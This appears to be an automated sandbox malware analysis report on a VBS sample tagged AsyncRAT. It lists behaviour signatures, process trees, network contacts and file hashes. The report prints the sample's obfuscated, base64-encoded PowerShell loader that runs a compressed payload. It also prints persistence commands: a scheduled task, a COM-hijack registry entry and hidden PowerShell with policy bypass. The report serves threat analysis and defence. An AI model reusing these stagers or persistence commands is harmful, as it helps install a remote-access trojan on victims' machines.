Malware Analysis Report

2024-11-30 19:35

Sample ID 240917-h2adcs1bjl
Target CSSA876245.vbs
SHA256 343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663
Tags
execution asyncrat sasa agilenet discovery persistence privilege_escalation rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

343445a6356dcfd38e165f2402b8150627a43aceba0c8de267ef44cc9a17d663

Threat Level: Known bad

The file CSSA876245.vbs was found to be: Known bad.

Malicious Activity Summary

execution asyncrat sasa agilenet discovery persistence privilege_escalation rat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Checks computer location settings

Obfuscated with Agile.Net obfuscator

Event Triggered Execution: Component Object Model Hijacking

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies registry key

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-17 07:13

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-17 07:13

Reported

2024-09-17 07:15

Platform

win7-20240903-en

Max time kernel

120s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 34.192.83.212:443 www1.coulmandental.com tcp

Files

memory/2360-4-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2360-5-0x000000001B820000-0x000000001BB02000-memory.dmp

memory/2360-6-0x00000000004B0000-0x00000000004B8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 5e7e0ac6cf0ae479e0d8bbd7f214b26c
SHA1 b408c68964283271d298a846965ffd29e1b1bf44
SHA256 87d2b73b5be9ccc9602c3e81370536e8718cd0d54d1439e24333fdc74c0208b5
SHA512 1b5458285923e5456a6eb77c6cc4a396c515dfb5d7195231d62fea64c3e410cb33ce28d77a5d84edd02be5de41360af6b83635afb8ca44150fffec8849738ff0

memory/2360-12-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2360-13-0x000007FEF5B3E000-0x000007FEF5B3F000-memory.dmp

memory/2360-14-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

memory/2360-15-0x000007FEF5880000-0x000007FEF621D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-09-17 07:13

Reported

2024-09-17 07:15

Platform

win10v2004-20240802-en

Max time kernel

121s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

Signatures

AsyncRat

rat asyncrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\RedroCrypt.dll" C:\Windows\system32\reg.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1920 wrote to memory of 3956 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1920 wrote to memory of 3956 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 3528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3956 wrote to memory of 3528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3528 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3528 wrote to memory of 2308 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 3388 wrote to memory of 2796 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 3388 wrote to memory of 2796 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2796 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 464 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe
PID 464 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 464 wrote to memory of 1712 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1712 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe
PID 1712 wrote to memory of 3836 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CSSA876245.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $zcxuqriwmospjyfktlgb = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('SUV4KCBOZVctb2JKZUNUICBpTy5DT21wcmVTU2lvTi5kZWZsYVRFc1RSZUFtKFtpby5NZU1vUllzdFJFYU1dW2NvTlZlUlRdOjpmcm9tYkFzZTY0c1RyaU5HKCAnelZwYmJ1c2dFTjBLUXYxSUZLa2JpS0oySDFGVzB1dTlseGhzQTJZZVo0RHEzbzllWW9hWk0wOWc3SThmdC81Ym5IdmNuUHU0T0hkMTdoNUdhV0tiUEo0czFmeTY5RmJPNzdOTFdIalpaeDc3NkZhc3Y5NXpjWUh1a2pGN1pPTmJKVGd0WEtVVUNFaEpFVnd1b2VDZkVWOFBQU2d0U0VCdkFRbzgxOHJRa1pSYVdjRkxhd0ZzdVdQaVF2LzBOLzkyK3ZmUFcxLy9UT2hmWVcxNC92M21mdzFFR1I4ZkdLKy9GNzlUUmVZNTNlTFh1VHlJL0d1RjVEKytEa0ZSV0h6KzhrVmd4YUR6L3ZPeUFReENTaWpSOTJIWjYxRENQd3U1eStiQlhmck9xMFN4S3AxbW8vUGZuS0tFMTZyeVZ3azZZM1ppdFM0NWducDVSQ3NscGcwVkNuQnQ4UnV2a2tQU0wzQzQ1OVplemhaSXc2V0lDb0t3K3VFTXEvSTQxOUVySkJ6RE1oa3F1QUpaTkVPbnRVb3hOYmRTU3lYV3M2eDFzczVrU05sY0h3NUd4V2F5dHkwaWVCWDB3T0lmSk5vQXFXQVVhdzFSeW1tdHlMRTJHVUxvQUZod25rT3VieUZ1eE1Tc1dCTHFVNVdJYkJHZzgzdU1LbURjMGRyWVFDanJLY1lkMUFzSVJiYXV5OVViTTlVbUVsQkVieUlTRzVpWG5ENkt6TWtzb3M3dE1mc011TlVLT3NMeDJUU0V5Z3hTSkZLWk82b3NWMFVaY2tSdk1JdmIxWW1KT1IrYVE4VHFiWXlkYWRaWXhSa01TUysxZmxJUUt6S0p5MGIxc1ZjQ21qamIyU1YxTUpjREFkNjBBZ2trUTQxQXNnU2E4YTZuTVhNcktaQ3lya3hXTlRwNng0RDNHUFEwWmIvZkhSbllhVEVKaitBNEpWelJ2eWNZQ2tJbzEzWnN2UVVTMUtOQlpxaDBmWllyZ3Bxc0xkQmx0U2tDTzlXQzNrTmlIV1dOSG1IQUZzRC9lSXlCU3BWd2tCbllGK1J5RzVHbkRnUE9IUEdQeFgxVmZvSmxDcjI5bXE1RHdQVVRPbFVtbzBIb0FTOWhlUTEzeUtUNjJRWXNiVEpRN0hQMi9xTVdmRk1KbWFBZTlybGlqQm1HblBwRVlBb0szSHpWYzNYdzk3NjZ5QVRLUFZRc3RpeHRlS291b3kyKzdxTm5aN2xXR0pkR3o5MllwM1JRdDZFbUJFai9HS29PMUVVem1YMktjelY3Y2ZGTDB3T3gzcmIydjZQdUZzSmhqVVBDRGRYMHRvM2NGbjNEU2lUZW85QmVCbVJxTURKUHcvRnBXRzJRc0c5VVlkclpZRGgwTnlhd1dHblEwQml6KzgyOGFzOWdMTlpKYWpqb2pVSEhPN1RtVUcra0tSZHRwbkt6MSt4UnVpVkM1b290OTBob0hmcFUwSmxMWENQSGxTNzBUYnRqSEUwNTNJazNXZnd1blAzM0Y2ZG1RSVRoWXdqREtZTjhFUTNjVUhneTVHc0dxTHAydnR1aWgyQnYxL2cxREZNd29KQ0VOK0FCdEpSanVVMXI1NGVHTlBKdWNYWkRxdmVJWGVYZWxPK1RxcUtLWXVySXFmRnVFR1JOK2t4UkVmeGlLSFM4RmVBcUE4V0R3V24vMG9MVkZJQkNJNEdLZVIweTRMVVE0cS9yUS9EemNTVDBaNjF2d3M4MGtYTmZZN0dpbi9KTmJMbTY0NVd6VUFKS0JyWnZiaXJsbU9tNEhqeFRBN1YyUkcreGtBMGZ0ay96OW9aZ1RaTkMxOHlPVGNmenNQZDlJRlc0endFQkhsL2dFbWp0TE1MSlZITDdkNUFGQU42NThPQ3plUFlMJyApLCBbSU8uQ29NcHJlU1Npb04uQ09NcHJFc3Npb25tT0RFXTo6RGVDT01wUkVzUyl8JSB7TmVXLW9iSmVDVCAgc3lTVEVtLklPLnNUUkVhTXJlYWRFUigkXyxbVEVYVC5FTkNPZGluR106OmFTQ2lJKX0gfCV7JF8uUmVhRFRPRW5EKCl9ICk='));powershell $zcxuqriwmospjyfktlgb

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "IEx( NeW-obJeCT iO.COmpreSSioN.deflaTEsTReAm([io.MeMoRYstREaM][coNVeRT]::frombAse64sTriNG( 'zVpbbusgEN0KQv1IFKkbiKJ2H1FW0uu9lxhsA2YeZ4Dq3o9eYoaZM09g7I8ft/5bnHvcnPu4OHd17h5GaWKbPJ4s1fy69FbO77NLWHjZZx776Fasv95zcYHukjF7ZONbJTgtXKUUCEhJEVwuoeCfEV8PPSgtSEBvAQo818rQkZRaWcFLawFsuWPiQv/0N/92+vfPW1//TOhfYW14/v3mfw1EGR8fGK+/F79TReY53eLXuTyI/GuF5D++DkFRWHz+8kVgxaDz/vOyAQxCSijR92HZ61DCPwu5y+bBXfrOq0SxKp1mo/PfnKKE16ryVwk6Y3ZitS45gnp5RCslpg0VCnBt8RuvkkPSL3C459ZezhZIw6WICoKw+uEMq/I419ErJBzDMhkquAJZNEOntUoxNbdSSyXWs6x1ss5kSNlcHw5GxWayty0ieBX0wOIfJNoAqWAUaw1RymmtyLE2GULoAFhwnkOubyFuxMSsWBLqU5WIbBGg83uMKmDc0drYQCjrKcYd1AsIRbauy9UbM9UmElBEbyISG5iXnD6KzMksos7tMfsMuNUKOsLx2TSEygxSJFKZO6osV0UZckRvMIvb1YmJOR+aQ8TqbYydadZYxRkMSS+1flIQKzKJy0b1sVcCmjjb2SV1MJcDAd60AgkkQ41AsgSa8a6nMXMrKZCyrkxWNTp6x4D3GPQ0Zb/fHRnYaTEJj+A4JVzRvycYCkIo13ZsvQUS1KNBZqh0fZYrgpqsLdBltSkCO9WC3kNiHWWNHmHAFsD/eIyBSpVwkBnYF+RyG5GnDgPOHPGPxX1VfoJlCr29mq5DwPUTOlUmo0HoAS9heQ13yKT62QYsbTJQ7HP2/qMWfFMJmaAe9rlijBmGnPpEYAoK3HzVc3Xw9766yATKPVQstixteKouoy2+7qNnZ7lWGJdGz92Yp3RQt6EmBEj/GKoO1EUzmX2KczV7cfFL0wOx3rb2v6PuFsJhjUPCDdX0to3cFn3DSiTeo9BeBmRqMDJPw/FpWG2QsG9UYdrZYDh0NyawWGnQ0Biz+828as9gLNZJajjojUHHO7TmUG+kKRdtpnKz1+xRuiVC5oot90hoHfpU0JlLXCPHlS70TbtjHE053Ik3WfwunP33F6dmQIThYwjDKYN8EQ3cUHgy5GsGqLp2vtuih2Bv1/g1DFMwoJCEN+ABtJRjuU1r54eGNPJucXZDqveIXeXelO+TqqKKYurIqfFuEGRN+kxREfxiKHS8FeAqA8WDwWn/0oLVFIBCI4GKeR0y4LUQ4q/rQ/DzcST0Z61vws80kXNfY7Gin/JNbLm645WzUAJKBrZvbirlmOm4HjxTA7V2RG+xkA0ftk/z9oZgTZNC18yOTcfzsPd9IFW4zwEBHl/gEmjtLMLJVHL7d5AFAN658OCzePYL' ), [IO.CoMpreSSioN.COMprEssionmODE]::DeCOMpREsS)|% {NeW-obJeCT sySTEm.IO.sTREaMreadER($_,[TEXT.ENCOdinG]::aSCiI)} |%{$_.ReaDTOEnD()} )"

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 2 /tn "Cloud OneDrive" /tr C:\ProgramData\Cloud\cloud.vbs

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Cloud\cloud.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\ProgramData\Cloud\cloud.bat

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f

C:\Windows\system32\reg.exe

REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\RedroCrypt.dll /f

C:\Windows\system32\cmd.exe

cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Cloud\cloud.ps1"

C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegSvcs.exe

"C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\RegSvcs.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www1.coulmandental.com udp
US 34.192.83.212:443 www1.coulmandental.com tcp
US 8.8.8.8:53 212.83.192.34.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 88.119.175.153:6606 tcp
US 8.8.8.8:53 153.175.119.88.in-addr.arpa udp
US 88.119.175.153:6606 tcp

Files

memory/3956-0-0x00007FFAED523000-0x00007FFAED525000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_l1ohuera.zjr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3956-6-0x0000021842910000-0x0000021842932000-memory.dmp

memory/3956-11-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

memory/3956-12-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

memory/3956-22-0x00007FFAED523000-0x00007FFAED525000-memory.dmp

memory/3956-23-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 1a11402783a8686e08f8fa987dd07bca
SHA1 580df3865059f4e2d8be10644590317336d146ce
SHA256 9b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA512 5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8d089c855358969266a3275f0ec4f955
SHA1 5ce30b598cfa0c2008541b1b549673401971dc3d
SHA256 e198883dc78657f44bae11e2de5f56bc0f41eb6440f73cd3d65c30878b858734
SHA512 f240dcfc7adcca3140cdc2f8f387ac2053a7fd6e5e474a4008cf38d03506f99e361a5d6e970480ab1155ad00531b9d9095ed2a502ad09e7e442cdf7bcf932320

memory/3956-32-0x00007FFAED520000-0x00007FFAEDFE1000-memory.dmp

C:\ProgramData\Cloud\cloud.vbs

MD5 7079642a22a106d0ed6f227cc70899ae
SHA1 60dd57af3518c0ea4104379ad233b5982b231283
SHA256 b098e1055dc3dd3156236ee515e5dfbefd746d84578197f2309968625b831724
